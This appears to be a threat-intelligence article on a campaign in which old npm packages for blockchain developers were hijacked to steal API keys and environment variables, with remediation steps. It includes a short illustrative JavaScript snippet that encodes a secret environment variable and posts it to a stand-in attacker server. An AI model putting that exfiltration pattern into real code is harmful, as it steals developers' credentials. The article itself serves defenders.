
Cybersecurity researchers have uncovered a campaign involving hijacked npm packages, some over nine years old, that were modified to exfiltrate sensitive data such as API keys and environment variables. The packages, which originally provided legitimate functionality for blockchain developers, were compromised to include obfuscated scripts that siphoned data to attacker-controlled servers or Gmail accounts. This incident highlights the persistent risks in open-source software supply chains, particularly in cryptocurrency-related tooling.
TL;DR: Key Findings
- Threat: Multiple npm packages (some 9+ years old) hijacked to steal API keys and environment variables.
- Exfiltration: Data sent via Gmail or attacker-controlled servers, including Solana private keys.
- Obfuscation: Malicious scripts were heavily obfuscated to evade detection.
- Historical Context: npm has been a frequent target for supply-chain attacks, including dependency confusion campaigns in 2022-2023.
Technical Details
The hijacked packages were identified by Sonatype researcher Ax Sharma, who noted that the malicious updates introduced obfuscated JavaScript designed to harvest environment variables. The scripts used base64 encoding and dynamic string concatenation to avoid static analysis. For example:
```javascript
// Example of obfuscated payload (simplified): encode a secret and post it
// to a collection endpoint, guarded so it only runs when the variable is set.
const exfil = (d) => Buffer.from(d).toString('base64');
process.env.SECRET_KEY && fetch('https://malicious-server.com/log', {
  method: 'POST',
  body: exfil(process.env.SECRET_KEY)
});
```
The attackers likely gained access to maintainer accounts via phishing or credential stuffing, then pushed malicious updates. The packages were downloaded thousands of times before detection, amplifying the impact.
Relevance to Security Teams
This attack underscores several challenges:
- Supply-chain risks: Legacy packages with low maintenance are prime targets for takeover.
- Obfuscation techniques: Attackers increasingly use runtime string assembly to bypass static scanners.
- Cryptocurrency focus: Blockchain developers are high-value targets due to the potential for direct financial theft.
Remediation Steps
Organizations should:
- Audit npm dependencies for packages with sudden version updates after long inactivity.
- Implement runtime monitoring for unexpected network connections from build systems.
- Enforce multi-factor authentication for all package maintainer accounts.
Conclusion
The hijacking of long-standing npm packages demonstrates the evolving sophistication of supply-chain attacks. As attackers shift focus from direct exploitation to compromising trusted components, proactive dependency management and runtime monitoring become critical defenses.
References
- Ax Sharma, “[Multiple Crypto Packages Hijacked, Turned Into Info-Stealers](https://www.sonatype.com/blog/multiple-crypto-packages-hijacked-turned-into-info-stealers)”. Sonatype. [Accessed: 2025-03-28].
- “[Nine-Year-Old npm Packages Hijacked to Exfiltrate API Keys via Obfuscated Scripts](https://thehackernews.com/2025/03/nine-year-old-npm-packages-hijacked-to.html)”. The Hacker News. [Accessed: 2025-03-28].
- “[Cyware Daily Threat Intelligence Briefing](https://www.cyware.com/resources/threat-briefings/daily-threat-briefing/cyware-daily-threat-intelligence-january-09-2025)”. Cyware. [Accessed: 2025-03-28].